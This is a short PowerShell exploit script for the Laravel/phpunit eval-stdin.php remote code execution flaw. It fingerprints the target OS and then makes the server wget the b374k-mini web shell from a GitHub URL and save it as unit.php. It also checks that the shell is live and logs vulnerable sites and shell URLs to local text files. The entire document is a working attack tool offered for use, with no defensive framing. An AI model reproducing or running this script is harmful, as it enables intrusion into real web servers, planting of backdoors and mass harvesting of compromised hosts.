Laravel phpunit Remote Code Execution RCE

1. # Clear the screen based on the OS
2. if ($env:OS -like "Windows*") {
3. Clear-Host
4. } else {
5. Write-Host $("\033c") # This is an approximation; PowerShell on non-Windows may vary
6. }
7.  
8. # Function to check and exploit the RCE vulnerability
9. function Invoke-RCE {
10. param (
11. [string]$Url
12. )
13.  
14. $cekosPayload = '<?php echo php_uname("a"); ?>'
15. $upshellPayload = '<?php system("wget https://raw.githubusercontent.com/The404Hacking/b374k-mini/master/b374k.php -O unit.php"); ?>'
16.  
17. try {
18. $cek = Invoke-RestMethod -Uri "$Url/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" -Method Post -Body $cekosPayload -TimeoutSec 50
19. if ($cek -match "Linux") {
20. Write-Host "[os] $cek"
21. Add-Content -Path "phpunitvuln.txt" -Value ("$cek`n$Url/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`n")
22. Invoke-RestMethod -Uri "$Url/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" -Method Post -Body $upshellPayload
23. $cekshell = Invoke-RestMethod -Uri "$Url/vendor/phpunit/phpunit/src/Util/PHP/unit.php?ngacengan_su"
24.  
25. if ($cekshell -match "IDBTE4M") {
26. Write-Host "[Shell Uploaded] $Url/vendor/phpunit/phpunit/src/Util/PHP/unit.php?ngacengan_su"
27. Add-Content -Path "shell_phpunit.txt" -Value ("$cek`n$Url/vendor/phpunit/phpunit/src/Util/PHP/unit.php?ngacengan_su`n")
28. } else {
29. Write-Host "[Shell not Uploaded]: $cekshell"
30. }
31. } else {
32. Write-Host "[Not Vuln]: $Url"
33. }
34. } catch {
35. Write-Host "Error contacting $Url"
36. }
37. }
38.  
39. # Example usage:
40. Invoke-RCE -Url "http://example.com"
41.